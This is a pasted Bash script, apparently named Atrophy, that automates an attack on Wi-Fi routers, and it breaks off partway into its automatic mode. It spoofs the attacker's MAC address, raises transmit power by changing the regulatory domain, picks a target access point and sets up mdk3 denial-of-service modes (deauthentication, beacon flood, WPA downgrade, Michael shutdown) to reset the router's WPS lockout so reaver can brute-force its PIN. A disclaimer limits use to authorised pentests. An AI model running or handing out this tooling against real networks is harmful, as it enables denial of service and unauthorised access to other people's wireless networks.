Advertisement
Guest User

Untitled

a guest
Aug 3rd, 2015
178
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 32.95 KB | None | 0 0
  1. #!/bin/bash
  2. # This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
  3. # License as published by the Free Software Foundation; either version 2 of the License, or any later version.
  4. # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
  5. # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  6. # You should have received a copy of the GNU General Public License along with this program; if not, write to the
  7. # Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
  8. # --------------------------------------------------------------------------------------------------------------------#
  9.  
  10. # Disclaimer:   This script is intended for use only for private study or during an authorised pentest. The author bears no responsibility for malicious or illegal use.
  11. #               Skiddies should look elsewhere.
  12.  
  13.  
  14. #
  15. # !!!!!!!Thanks to Vulpi author of pwnstar9.0 who's scripts taught us so much!!!!!!!
  16. #               Any help with our mangeled coding is encouraged.
  17. #                              Musket Teams
  18. ##############################################
  19. # ANSI code routines from Vulpi author of
  20. #              PwnStar9.0
  21. txtrst="\e[0m"      # Text reset
  22. warn="\e[1;31m"     # warning          red        
  23. info="\e[1;34m"     # info                 blue            
  24. q="\e[1;32m"        # questions        green
  25. inp="\e[1;36m"      # input variables  magenta
  26. yel="\e[1;33m"      # typed keyboard entries
  27. ##############################################
  28. echo " "
  29. echo -e "$info      ######################################################################"
  30. echo "      #               Atrophy: A Mdk3-Airodump-ng-Reaver Tool              #"
  31. echo "      # MDK3 Multiple Vector DDOS Setup to Reset Wireless Routers Remotely #"
  32. echo "      #              A Musket Team - Soxrox2212 Collaboration              #"
  33. echo -e "      ######################################################################$txtrst"
  34.  
  35. echo -e "$info                                                                        "      
  36. echo -e "$warn  <<< ALL EXISTING MONITOR INTERFACES $yel(i.e. mon0 mon1 etc.)$warn WILL BE CLEARED >>>"
  37. echo -e "$q               <<<< ??Do you wish to continue....?? >>>>$txtrst"
  38.  
  39. while true
  40.  
  41. do
  42. echo -e "$inp       Please confirm by pressing $yel(y/Y)$inp to continue...."
  43. echo -e "         Press $yel(n/N)$inp to abort!!..Press any other key to try again:$txtrst"
  44.  
  45.   read CONFIRM
  46.   case $CONFIRM in
  47.     y|Y|YES|yes|Yes) break ;;
  48.     n|N|no|NO|No)
  49.       echo Aborting - you entered $CONFIRM
  50.       exit
  51.       ;;
  52.  
  53.   esac
  54. done
  55. echo -e "$info  You entered $CONFIRM.  Continuing ...$txtrst"
  56. sleep 3
  57.  
  58. clear
  59. killall -q reaver &> /dev/null
  60. sleep .2
  61. killall -q airodump-ng &> /dev/null
  62. sleep .2
  63. killall -q aireplay-ng &> /dev/null
  64. sleep .2
  65. killall -q mdk3 &> /dev/null
  66. sleep .2
  67. killall -q Eterm &> /dev/null
  68. airmon-ng stop mon5
  69. clear
  70. airmon-ng stop mon4
  71. clear
  72. airmon-ng stop mon3
  73. clear
  74. airmon-ng stop mon2
  75. clear
  76. airmon-ng stop mon1
  77. clear
  78. airmon-ng stop mon0
  79.  
  80. ####################################
  81. ADVANCEDTEST=ZZZ
  82. until  [ $ADVANCEDTEST == y ] || [ $ADVANCEDTEST == Y ]; do  
  83.  
  84. clear
  85. echo ""
  86. echo -e "$q  Do you wish to use standard or advanced setting?"
  87. echo -e "$info     These advanced settings include.$txtrst"
  88. echo ""
  89. echo "                    1. Setting Specific Mac Address to your wifi device."
  90. echo "                    2. Add -r x:y command to reaver." #(ADVANCED)"
  91. echo ""
  92. echo -e "$inp  Enter $yel(s/S)$inp for standard or $yel(a/A)$inp for advanced.$txtrst" #(ADVANCED)  
  93. read ADVANCED
  94.  
  95.  
  96.     while true
  97.     do
  98.     echo ""
  99. echo -e "$inp  You entered $yel$ADVANCED$inp type $yel(y/Y)$inp to confirm or $yel(n/N)$inp to try again.$txtrst"
  100. read ADVANCEDTEST
  101.  
  102.     case $ADVANCEDTEST in
  103.     y|Y|n|N) break ;;
  104.     ~|~~)
  105.     echo Aborting -
  106.     exit
  107.     ;;
  108.  
  109.     esac
  110.     echo -e  "$warn  !!!Wrong input try again!!!$txtrst"
  111.  
  112.     done
  113.  
  114.         done
  115.  
  116.  
  117. ####################################
  118.  
  119.  
  120. DEVTEST=ZZZ
  121. until  [ $DEVTEST == y ] || [ $DEVTEST == Y ]; do  
  122. echo -e "$txtrst "
  123. clear
  124. iwconfig
  125. echo ""
  126. echo -e "$q  What wireless device will you use to perform the attack$yel(i.e. wlan0,ath0 etc)$q?"
  127. echo -e "$info    A listing of devices is shown above.$txtrst" #(DEV)
  128. read DEV
  129.  
  130.     while true
  131.     do
  132.     echo ""
  133.  
  134. echo -e "$inp  You entered $yel$DEV$inp type $yel(y/Y)$inp to confirm or $yel(n/N)$inp to try again.$txtrst"
  135. read DEVTEST
  136.  
  137.     case $DEVTEST in
  138.     y|Y|n|N) break ;;
  139.     ~|~~)
  140.     echo Aborting -
  141.     exit
  142.     ;;
  143.  
  144.     esac
  145.     echo -e  "$warn  !!!Wrong input try again!!!$txtrst"
  146.  
  147.     done
  148.  
  149.         done
  150.  
  151.  
  152. clear
  153.     while true
  154.     do
  155.     echo ""
  156. echo -e "$q  Do you wish to boost your wifi device power to 30dBm?"
  157. echo -e "$info     This routine works for the AWUSO36H and" #(AWUSO)
  158. echo -e "$info       may work with other devices."
  159. echo -e "$inp         Type $yel(y/Y)$inp for yes or $yel(n/N)$inp for no.$txtrst"
  160.         read AWUSO
  161.         case $AWUSO in
  162.         y|Y|n|N) break ;;
  163.         ~|~~)
  164.         echo Aborting -
  165.         exit
  166.         ;;
  167.  
  168.         esac
  169.         echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  170.  
  171.             done
  172.  
  173.  
  174.     if [ $AWUSO == y ] || [ $AWUSO == Y ]; then
  175.         ifconfig $DEV down
  176.         sleep 1
  177.         iw reg set BO
  178.         ifconfig $DEV up
  179.         iwconfig $DEV channel 13
  180.         iwconfig $DEV txpower 30
  181.         iwconfig $DEV rate 1M
  182.             sleep 2
  183.  
  184.             fi
  185. ##############========ADVANCED===============
  186. if [ $ADVANCED == a ] || [ $ADVANCED == A ]; then
  187.  
  188. echo -e "$q\n  What mac address would you like to assign to $DEV?" #(DEVMAC)
  189. echo -e  "$info\n     Enter in this format ONLY(i.e. 00:11:22:33:44:55)$txtrst"
  190. read DEVMAC
  191. sleep 2
  192. #### MAC Error Handling Begins ###
  193. ##################################
  194. # Error Handling For Mac Code Entries
  195. # Tests Length of string
  196. # Tests  Presence of only ::::: punctuation characters
  197. # Tests only hex charcters present
  198.  
  199. #Sets correct puntuation for test
  200. MACPUNCT=":::::"
  201.  
  202. sleep .2
  203.  
  204. # Tests punctuation
  205.  
  206. PUNCTEST=`echo "$DEVMAC" | tr -d -c ".[:punct:]"`
  207.  
  208. sleep .2
  209.  
  210. if [ "$PUNCTEST" == "$MACPUNCT" ]
  211.  
  212.     then
  213.  
  214.         PUNCT=1
  215.  
  216.     else
  217.  
  218.         PUNCT=0
  219.  
  220.     fi
  221.  
  222. sleep .2
  223.  
  224. # Tests hex characters
  225.  
  226. MACALNUM=`echo "$DEVMAC" | tr -d -c ".[:alnum:]"`
  227.  
  228. sleep .2
  229.  
  230.  
  231. if [[ $MACALNUM =~ [A-Fa-f0-9]{12} ]]
  232.  
  233. then
  234.  
  235.     ALNUM=1
  236. else
  237.  
  238.     ALNUM=0
  239.   fi
  240.  
  241. sleep .2
  242.  
  243. # Tests string length
  244.  
  245. if [ ${#DEVMAC} = 17 ]
  246.  
  247. then
  248.  
  249.     MACLEN=1
  250. else
  251.  
  252.     MACLEN=0
  253.   fi
  254.  
  255.  
  256. sleep .2
  257.  
  258. # All mac variables set to ones(1)  and zeros(0)
  259.  
  260. until [ $MACLEN == 1 ] && [ $PUNCT == 1 ] && [ $ALNUM == 1 ]; do
  261.  
  262.     if [ $ALNUM == 0 ]; then
  263.         echo -e "$warn  You are using a non-hex character.$txtrst"
  264.  
  265.             fi
  266.    
  267.     if [ $MACLEN == 0 ]; then
  268.         echo -e "$warn  Your mac address is the wrong length.$txtrst"
  269.  
  270.             fi
  271.  
  272.     if [ $PUNCT == 0 ]; then
  273.  
  274.         echo -e "$warn  You have entered the wrong and/or too many separators - use ONLY colons :$txtrst"
  275.  
  276.             fi
  277.  
  278.     echo -e "$info  Mac address entry incorrect!!!"
  279.         echo "  You must use format 00:11:22:33:44:55 or aa:AA:bb:BB:cc:CC"
  280.     echo "  Only a thru f, A thru F, 0 thru 9 and the symbol :  are allowed."
  281.     echo -e "$inp  Reenter mac address and try again.$txtrst" #(DEVMAC)
  282.     read DEVMAC
  283.  
  284.         MACALNUM=`echo "$DEVMAC" | tr -d -c ".[:alnum:]"`
  285.     if [[ $MACALNUM =~ [A-Fa-f0-9]{12} ]]
  286.  
  287.         then
  288.  
  289.             ALNUM=1
  290.  
  291.         else
  292.  
  293.             ALNUM=0
  294.  
  295.             fi
  296.  
  297. sleep .2      
  298.  
  299.     if [ ${#DEVMAC} == 17 ]
  300.  
  301.     then
  302.  
  303.         MACLEN=1
  304.     else
  305.  
  306.         MACLEN=0
  307.  
  308.             fi
  309.  
  310. sleep .2
  311.  
  312.     PUNCTEST=`echo "$DEVMAC" | tr -d -c ".[:punct:]"`
  313.     if [ $PUNCTEST == $MACPUNCT ]
  314.  
  315.     then
  316.  
  317.         PUNCT=1
  318.  
  319.     else
  320.  
  321.         PUNCT=0
  322.  
  323.             fi
  324.  
  325. sleep 1
  326.  
  327. done
  328.          
  329. #######Mac Error Handling Ends Whew!!#############
  330. ##################################################
  331.  
  332. echo -e "$info  Assigning $yel$DEVMAC$info to your wifi device.$txtrst"
  333.         sleep 2
  334. sleep 2
  335.     ifconfig $DEV down
  336.     sleep 2
  337.     macchanger -m $DEVMAC $DEV
  338.     sleep 2
  339.     VARMAC=$(ifconfig $DEV | grep "$DEV     Link encap:Ethernet  HWaddr " | sed s/"$DEV     Link encap:Ethernet  HWaddr "//g)
  340.     sleep 2
  341.     ifconfig $DEV hw ether $VARMAC
  342.     sleep 2
  343.     ifconfig $DEV up
  344.         sleep 2
  345.     airmon-ng start $DEV
  346.     sleep 2
  347.         clear
  348.         fi
  349.  
  350. ##############======End MAC Advanced=================
  351.  
  352. if [ $ADVANCED == s ] || [ $ADVANCED == S ]; then
  353.  
  354.     echo -e "$info  Assigning a random mac address to device.$txtrst"
  355.         sleep 2
  356.     ifconfig $DEV down
  357.     sleep 2
  358.     macchanger -r $DEV
  359.     sleep 2
  360.     VARMAC=$(ifconfig $DEV | grep "$DEV     Link encap:Ethernet  HWaddr " | sed s/"$DEV     Link encap:Ethernet  HWaddr "//g)
  361.     sleep 2
  362.     ifconfig $DEV hw ether $VARMAC
  363.     sleep 2
  364.     ifconfig $DEV up
  365.     airmon-ng start $DEV
  366.     sleep 2
  367.         clear
  368.  
  369.         fi
  370. MONTEST=ZZZ
  371. until  [ $MONTEST == y ] || [ $MONTEST == Y ]; do  
  372. echo -e "$txtrst "
  373. clear
  374. iwconfig
  375. echo ""
  376. echo -e "$q  What wireless monitor interface $yel(i.e. mon0, mon1)$q will"
  377. echo -e "     be used by mdk3,reaver and airodump-ng?"
  378. echo -e "$info      A listing of devices is shown above.$txtrst" #(MON)
  379. read MON
  380.  
  381.     while true
  382.     do
  383.     echo ""
  384.  
  385. echo -e "$inp  You entered $yel$MON$inp type $yel(y/Y)$inp to confirm or $yel(n/N)$inp to try again.$txtrst"
  386. read MONTEST
  387.  
  388.     case $MONTEST in
  389.     y|Y|n|N) break ;;
  390.     ~|~~)
  391.     echo Aborting -
  392.     exit
  393.     ;;
  394.  
  395.     esac
  396.     echo -e  "$warn  !!!Wrong input try again!!!$txtrst"
  397.  
  398.     done
  399.  
  400.         done
  401.  
  402. sleep .2
  403. echo -e "$info  Assigning $yel$DEV$info mac address to $yel$MON$info.$txtrst"
  404. ifconfig $MON down
  405. sleep 1
  406. macchanger -m $VARMAC $MON
  407. sleep .1
  408. ifconfig $MON up
  409. sleep 1
  410. clear
  411. echo ""
  412. ################-rXY starts############################
  413. RCHOICE=n
  414. if [ $ADVANCED == a ] || [ $ADVANCED == A ]; then
  415.  
  416.     clear
  417.     while true
  418.     do
  419.     echo ""
  420. echo -e "$q  Do you wish to run reaver with the -r, --recurring-delay=<x:y> command"
  421. echo "     i.e. Sleep for y seconds every x pin attempts"
  422. echo ""
  423. echo -e "$inp    Type $yel(y/Y)$inp for yes and $yel(n/N)$inp for no:(RCHOICE).$txtrst"
  424.     read RCHOICE  
  425.     case $RCHOICE in
  426.     y|Y|n|N) break ;;
  427.     ~|~~)
  428.     echo Aborting -
  429.     exit
  430.     ;;
  431.  
  432.     esac
  433.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  434.  
  435.         done
  436.  
  437.  
  438.     if [ $RCHOICE == Y ]; then
  439.  
  440.         RCHOICE=y
  441.  
  442.         fi
  443.  
  444.     if [ $RCHOICE == N ]; then
  445.  
  446.         RCHOICE=n
  447.  
  448.         fi
  449.  
  450.     if [ $RCHOICE == y ]; then  # if 2
  451.  
  452.     RXTEST=ZZZ
  453.         until  [ $RXTEST == y ] || [ $RXTEST == Y ]; do  
  454.  
  455.         echo ""
  456.         echo -e "$q  How many pin attempts x in -r x:y before delay y in seconds?(RX)"
  457.         echo ""
  458.         echo -e "$inp     Enter number of pin attempts x.$txtrst" #(RX)
  459.         read RX
  460.  
  461.         while true
  462.         do
  463.         echo ""
  464.  
  465.         echo -e "$inp  You entered $yel$RX$info type $yel(y/Y)$inp to confirm or $yel(n/N)$inp to try again.$tstrst"
  466.  
  467.         read RXTEST
  468.         case $RXTEST in
  469.         y|Y|n|N) break ;;
  470.         ~|~~)
  471.         echo Aborting -
  472.         exit
  473.         ;;
  474.  
  475.         esac
  476.         echo -e  "$warn  !!!Wrong input try again!!!$txtrst"
  477.  
  478.         done
  479.  
  480.             done
  481.  
  482.  
  483.         RYTEST=ZZZ
  484.         until  [ $RYTEST == y ] || [ $RYTEST == Y ]; do  
  485.  
  486.         clear
  487.         echo ""
  488.         echo -e "$q  How many seconds will Reaver sleep between pin attempts x, in -r $RX:y?"
  489.         echo ""
  490.         echo -e "$inp     Enter delay in seconds y.(RY)$txtrst"
  491.         read RY
  492.  
  493.         while true
  494.         do
  495.         echo ""
  496.         echo -e "$inp  You entered $yel$RY$inp type $yel(y/Y)$inp to confirm or $yel(n/N)$inp to try again.$txtrst"
  497.  
  498.         read RYTEST
  499.         case $RYTEST in
  500.         y|Y|n|N) break ;;
  501.         ~|~~)
  502.         echo Aborting -
  503.         exit
  504.         ;;
  505.  
  506.         esac
  507.         echo -e  "$warn  !!!Wrong input try again!!!$txtrst"
  508.  
  509.         done
  510.  
  511.             done
  512.  
  513.             fi
  514.  
  515.                 fi
  516.  
  517.  
  518. #################-rXY ends#################################
  519.  
  520.  
  521. echo ""
  522. echo -e "$info  <<<< You will need the following information to setup the DOS attack. >>>>"
  523. echo ""
  524. echo -e "$txtrst       1. Channel of target AP."
  525. echo "       2. Mac address of target AP."
  526. echo ""
  527.  
  528. ####################################
  529.  
  530.     while true
  531.     do
  532.         echo ""
  533.     echo -e "$info  Do you wish to run wash or airodump-ng to obtain this information?" #(WASHAIR)
  534.     echo -e "$inp     Type $yel(w/W)$inp for wash, $yel(a/A)$inp for airodump-ng or"
  535.     echo -e "       type $yel(c/C)$inp to skip a scan for a target AP and continue....$txtrst"
  536.  
  537.         read WASHAIR
  538.         case $WASHAIR in
  539.             w|W|a|A|c|C) break ;;
  540.             ~|~~)
  541.             echo Aborting -
  542.             exit
  543.             ;;
  544.  
  545.         esac
  546.         echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  547.  
  548.             done
  549.  
  550.  
  551. if [ $WASHAIR == w ] || [ $WASHAIR == W ]; then
  552.  
  553.     until [ $WASHAIR == c ] || [ $WASHAIR == C ]; do
  554.     killall -q Eterm &> /dev/null
  555.         sleep .2
  556.     Eterm -g 80x30-1-210 --cmod "red" -T "WASH" -e sh -c "wash -i $MON; bash" &
  557.     echo -e "$info  To capture a mac address from the Eterm Window type $yel "any key" $info and the"
  558.         echo "     Eterm window will halt. Use your mouse-left click and drag across the"
  559.         echo -e "       data required. Type $yel(Ctrl-c)$info to capture to clipboard. Now go"
  560.         echo -e "         to the Atrophy main menu and type $yel(shift-insert)$info to insert mac address.$txtrst" #(ANYKEY)
  561.     read ANYKEY
  562.     killall -q wash &> /dev/null
  563.  
  564.         clear
  565.         while true
  566.         do
  567.     echo ""
  568.         echo -e "$info  If you have the mac address and channel type $yel(c/C)$inp to"
  569.     echo -e "     continue.... or type $yel(w/W)$inp for wash to try again.$txtrst"
  570.  
  571.     read WASHAIR
  572.     case $WASHAIR in
  573.         c|C|w|W) break ;;
  574.         ~|~~)
  575.         exit
  576.         ;;
  577.  
  578.     esac
  579.     echo -e "$warn !!!error wrong input try again!!!$txtrst"
  580.  
  581.             done
  582.  
  583.         done
  584.  
  585.     fi 
  586.  
  587. if [ $WASHAIR == a ] || [ $WASHAIR == A ]; then
  588.         until [ $WASHAIR == c ] || [ $WASHAIR == C ]; do
  589.  
  590.     while true
  591.     do
  592.         echo -e "$q  Do you wish airodump-ng to scan all channels or scan a fixed channel?"
  593.     echo -e "$inp     Type $yel(1)$inp to scan all channels or $yel(2)$inp to scan a specific channel.$txtrst" #(CHANCHO)
  594.  
  595.     read CHANCHO
  596.     case $CHANCHO in
  597.     1|2) break ;;
  598.         ~|~~)
  599.         echo Aborting -
  600.         exit
  601.         ;;
  602.  
  603.     esac
  604.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  605.  
  606.         done
  607.  
  608.             if [ $CHANCHO == 1 ]; then
  609.  
  610.     killall -q Eterm &> /dev/null
  611.     clear
  612.         sleep .2
  613.     Eterm -g 80x30-1-210 --cmod "red" -T "AIRODUMP-NG" -e sh -c "airodump-ng $MON; bash" &
  614.     echo -e "$info  To capture a mac address from the Eterm Window type $yel(any key)$info and the"
  615.         echo "     Eterm window will halt. Use your mouse-left click and drag across the"
  616.         echo -e "       data required. Type $yel(Ctrl-c)$info to capture to clipboard. Now go"
  617.         echo -e "         to the Atrophy main menu and type $yel(shift-insert)$info to insert mac address.$txtrst" #(ANYKEY)
  618.     read ANYKEY
  619.     killall -q airodump-ng &> /dev/null
  620.  
  621.  
  622.  
  623.     clear
  624.     while true
  625.     do
  626.     echo ""
  627.  
  628.     echo -e "$info  If you have the mac address and channel type $yel(c/C)$inp to"
  629.     echo -e "     continue... or type $yel(a/A)$inp for airodump-ng to try again.$txtrst"
  630.  
  631.     read WASHAIR
  632.     case $WASHAIR in
  633.     c|C|a|A) break ;;
  634.     ~|~~)
  635.     echo Aborting -
  636.     exit
  637.     ;;
  638.  
  639.     esac
  640.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  641.  
  642.         done
  643.  
  644.  
  645.  
  646.                 fi
  647.  
  648.  
  649.             if [ $CHANCHO == 2 ]; then
  650.     killall -q Eterm &> /dev/null
  651.     echo -e "$warn  If Eterm window was removed - ignore warning above.$txtrst"
  652.     sleep .2
  653.  
  654. ##########
  655.     clear
  656.     while true
  657.     do
  658.     echo ""
  659.     echo -e "$q  What is your target APs' channel?$txtrst" #(CHANNEL)
  660.  
  661.     read CHANNEL
  662.     case $CHANNEL in
  663.         1|2|3|4|5|6|7|8|9|10|11|12|13|14) break ;;
  664.         ~|~~)
  665.         echo Aborting -
  666.         exit
  667.         ;;
  668.  
  669.     esac
  670.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  671.  
  672.         done
  673.  
  674.  
  675.     Eterm -g 80x30-1-210 --cmod "red" -T "AIRODUMP-NG" -e sh -c "airodump-ng -c $CHANNEL $MON; bash" &
  676.     echo -e "$info  To capture a mac address from the Eterm Window type $yel(any key) $info and the"
  677.         echo "     Eterm window will halt. Use your mouse-left click and drag across the"
  678.         echo -e "       data required. Type $yel(Ctrl-c)$info to capture to clipboard. Now go"
  679.         echo -e "         to the Atrophy main menu and type $yel(shift-insert)$info to insert mac address.$txtrst" #(ANYKEY)
  680.     read ANYKEY
  681.     killall -q airodump-ng &> /dev/null
  682.  
  683.     clear
  684.     while true
  685.     do
  686.     echo ""
  687.         echo -e "$info  If you have the mac address and channel type $yel(c/C)$inp to"
  688.     echo -e "     continue... or type $yel(a/A)$inp for airodump-ng to try again.$txtrst"
  689.  
  690.     read WASHAIR
  691.     case $WASHAIR in
  692.         c|C|a|A) break ;;
  693.         ~|~~)
  694.         echo Aborting -
  695.         exit
  696.         ;;
  697.  
  698.     esac
  699.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  700.  
  701.                     done
  702.  
  703.                 fi
  704.    
  705.         done       
  706.     fi
  707.  
  708.    
  709. #################################
  710.  
  711. sleep .2
  712. killall -q wash &> /dev/null
  713. sleep .2
  714. killall -q airodump-ng &> /dev/null
  715. sleep 2
  716. clear
  717. echo ""
  718. echo -e "$q\n  What is your target APs' mac address?" #(TARGETAP)
  719. echo -e  "$info\n     Enter in this format ONLY(i.e. 00:11:22:33:44:55)$txtrst"
  720. read TARGETAP
  721. sleep 2
  722. #### MAC Error Handling Begins ###
  723. ##################################
  724. # Error Handling For Mac Code Entries
  725. # Tests Length of string
  726. # Tests  Presence of only ::::: punctuation characters
  727. # Tests only hex charcters present
  728.  
  729. #Sets correct puntuation for test
  730. MACPUNCT=":::::"
  731.  
  732. sleep .2
  733.  
  734. # Tests punctuation
  735.  
  736. PUNCTEST=`echo "$TARGETAP" | tr -d -c ".[:punct:]"`
  737.  
  738. sleep .2
  739.  
  740. if [ "$PUNCTEST" == "$MACPUNCT" ]
  741.  
  742.     then
  743.  
  744.         PUNCT=1
  745.  
  746.     else
  747.  
  748.         PUNCT=0
  749.  
  750.     fi
  751.  
  752. sleep .2
  753.  
  754. # Tests hex characters
  755.  
  756. MACALNUM=`echo "$TARGETAP" | tr -d -c ".[:alnum:]"`
  757.  
  758. sleep .2
  759.  
  760.  
  761. if [[ $MACALNUM =~ [A-Fa-f0-9]{12} ]]
  762.  
  763. then
  764.  
  765.     ALNUM=1
  766. else
  767.  
  768.     ALNUM=0
  769.   fi
  770.  
  771. sleep .2
  772.  
  773. # Tests string length
  774.  
  775. if [ ${#TARGETAP} = 17 ]
  776.  
  777. then
  778.  
  779.     MACLEN=1
  780. else
  781.  
  782.     MACLEN=0
  783.   fi
  784.  
  785.  
  786. sleep .2
  787.  
  788. # All mac variables set to ones(1)  and zeros(0)
  789.  
  790. until [ $MACLEN == 1 ] && [ $PUNCT == 1 ] && [ $ALNUM == 1 ]; do
  791.  
  792.     if [ $ALNUM == 0 ]; then
  793.         echo -e "$warn  You are using a non-hex character.$txtrst"
  794.  
  795.             fi
  796.    
  797.     if [ $MACLEN == 0 ]; then
  798.         echo -e "$warn  Your mac address is the wrong length.$txtrst"
  799.  
  800.             fi
  801.  
  802.     if [ $PUNCT == 0 ]; then
  803.  
  804.         echo -e "$warn  You have entered the wrong and/or too many separators - use ONLY colons :$txtrst"
  805.  
  806.             fi
  807.  
  808.     echo -e "$info  Mac address entry incorrect!!!"
  809.         echo "  You must use format 00:11:22:33:44:55 or aa:AA:bb:BB:cc:CC"
  810.     echo "  Only a thru f, A thru F, 0 thru 9 and the symbol :  are allowed."
  811.     echo -e "$inp  Reenter mac address and try again.$txtrst" #(TARGETAP)
  812.     read TARGETAP
  813.  
  814.         MACALNUM=`echo "$TARGETAP" | tr -d -c ".[:alnum:]"`
  815.     if [[ $MACALNUM =~ [A-Fa-f0-9]{12} ]]
  816.  
  817.         then
  818.  
  819.             ALNUM=1
  820.  
  821.         else
  822.  
  823.             ALNUM=0
  824.  
  825.             fi
  826.  
  827. sleep .2      
  828.  
  829.     if [ ${#TARGETAP} == 17 ]
  830.  
  831.     then
  832.  
  833.         MACLEN=1
  834.     else
  835.  
  836.         MACLEN=0
  837.  
  838.             fi
  839.  
  840. sleep .2
  841.  
  842.     PUNCTEST=`echo "$TARGETAP" | tr -d -c ".[:punct:]"`
  843.     if [ $PUNCTEST == $MACPUNCT ]
  844.  
  845.     then
  846.  
  847.         PUNCT=1
  848.  
  849.     else
  850.  
  851.         PUNCT=0
  852.  
  853.             fi
  854.  
  855. sleep 1
  856.  
  857. done
  858.  
  859. #######Mac Error Handling Ends Whew!!#############
  860. ##################################################
  861.  
  862. clear
  863. while true
  864. do
  865. echo ""
  866. echo -e "$q  What is your target APs' channel?$txtrst" #(CHANNEL)
  867.  
  868.     read CHANNEL
  869.     case $CHANNEL in
  870.         1|2|3|4|5|6|7|8|9|10|11|12|13|14) break ;;
  871.         ~|~~)
  872.         echo Aborting -
  873.         exit
  874.         ;;
  875.  
  876.     esac
  877.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  878.  
  879.         done
  880.  
  881. sleep 2
  882. echo $TARGETAP > blacklist
  883.  
  884. echo -e "$info  A Blacklist file is being written for Deauth/Disass"
  885. echo "      Amoke Mode using mac address seen below."
  886. echo -e "$txtrst "
  887. cat blacklist
  888. sleep 2
  889.  
  890.     clear
  891.     while true
  892.     do
  893.     echo ""
  894. echo -e $q  "Do you wish to use Beacon Flood Mode?"
  895. echo -e $inp     "Type $yel(y/Y)$inp for yes or $yel(n/N)$inp for no.$txtrst" #(BFM)
  896.  
  897.     read BFM
  898.     case $BFM in
  899.     y|Y|n|N) break ;;
  900.     ~|~~)
  901.     echo Aborting -
  902.     exit
  903.     ;;
  904.  
  905.     esac
  906.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  907.  
  908.         done
  909.  
  910.  
  911.  
  912.     clear
  913.     while true
  914.     do
  915.     echo ""
  916. echo -e $q  "Do you wish use WPA downgrade mode?"
  917.         echo -e "$inp     Type $yel(y/Y)$inp for yes or $yel(n/N)$inp for no.$txtrst" #(WPAD)
  918.  
  919.     read WPAD
  920.     case $WPAD in
  921.     y|Y|n|N) break ;;
  922.     ~|~~)
  923.     echo Aborting -
  924.     exit
  925.     ;;
  926.  
  927.     esac
  928.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  929.  
  930.         done
  931.  
  932.     clear
  933.     while true
  934.     do
  935.     echo ""
  936.  
  937. echo -e "$q  Do you wish to include the -j command in the Michael Shutdown Exploitation?$txtrst"
  938. echo -e "$info     If target AP supports WPA-TKIP, QOS is enabled and a client is present,"
  939. echo -e "       adding the -j command will reduce time it takes to reset router."
  940. echo ""  
  941. echo -e "$inp Type $yel(y/Y)$inp to add command, type $yel(n/N)$inp to not add this command$txtrst" #(JTKIP)
  942.  
  943.     read JTKIP
  944.     case $JTKIP in
  945.     y|Y|n|N) break ;;
  946.     ~|~~)
  947.     echo Aborting -
  948.     exit
  949.     ;;
  950.  
  951.     esac
  952.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  953.  
  954.         done
  955.  
  956.  
  957.  
  958.  
  959.  
  960. killall -q Eterm &> /dev/null
  961. echo -e "$warn  If Eterm window was removed - ignore warning above.$txtrst"
  962.  
  963.  
  964. ##################Automatic Mode###########################################
  965.  
  966.     clear
  967.     while true
  968.     do
  969.     echo ""
  970.  
  971. echo ""
  972. echo -e "$warn  DO NOT USE AUTOMATIC MODE UNTIL YOU DETERMINE"
  973. echo -e "     ABILITY TO RESET ROUTER IN MANUAL MODE"
  974. echo ""
  975. echo -e "$q  Do you wish to use automatic mode or manual mode?"
  976. echo -e "$info     In automatic mode you can set time to run the mdk3 deauth."
  977. echo -e "       After time selected has passed, mdk3 will shut down and reaver"
  978. echo -e "         will run till WPS locking is seen, then mdk3 will run again."
  979. echo -e "                Use CTRL-C on program page to shutdown"
  980. echo ""
  981. echo -e "$warn  In automatic mode reaver output is written to a file named"
  982. echo -e "     /root/reaverlogfile not to the screen."
  983. echo -e "$inp  Type $yel(a/A)$inp for automatic mode or $yel(m/M)$inp for manual mode$txtrst" #(AUTOMAN)
  984.  
  985.     read AUTOMAN
  986.     case $AUTOMAN in
  987.     a|A|m|M) break ;;
  988.     ~|~~)
  989.     echo Aborting -
  990.     exit
  991.     ;;
  992.  
  993.     esac
  994.     echo -e  "$warn !!!Wrong input try again!!!$txtrst"
  995.  
  996.         done
  997.  
  998.  
  999.  
  1000.  
  1001. if [ $AUTOMAN == a ] || [ $AUTOMAN == A ]; then
  1002.  
  1003.     until  [ $MDKLIVETEST == y ] || [ $MDKLIVETEST == Y ]; do  
  1004. echo -e "$txtrst "
  1005. clear
  1006. echo ""
  1007. echo -e "$q  How long in minutes do you want mdk3 to run before?"
  1008. echo -e "     shutting down and starting reaver."
  1009. echo -e "$info       After time selected expires, mdk3 will shut down and reaver"
  1010. echo -e "         will start and run till WPS locking is seen."
  1011. echo -e "$warn    Enter time in minutes only!$txtrst" #(MDKLIVE)
  1012. read MDKLIVE
  1013.  
  1014.     while true
  1015.     do
  1016.     echo ""
  1017.  
  1018. echo -e "$inp  You entered $yel$MDKLIVE$inp min. type $yel(y/Y)$inp to confirm or $yel(n/N)$inp to try again.$txtrst"
  1019.    
  1020.     read MDKLIVETEST
  1021.     case $MDKLIVETEST in
  1022.     y|Y|n|N) break ;;
  1023.     ~|~~)
  1024.     echo Aborting -
  1025.     exit
  1026.     ;;
  1027.  
  1028.     esac
  1029.     echo -e  "$warn  !!!Wrong input try again!!!$txtrst"
  1030.  
  1031.     done
  1032.  
  1033.         done
  1034. clear  
  1035. echo ""
  1036. echo -e "$info  Mdk3 will run for $MDKLIVE minutes....$txtrst"
  1037. echo "  ==================================="
  1038.  
  1039. STARTAUTO=ZZZ #stops unary warning
  1040. let LIVE=MDKLIVE*60  #minutes to seconds
  1041. FN=1 #starts file outside loop
  1042.  
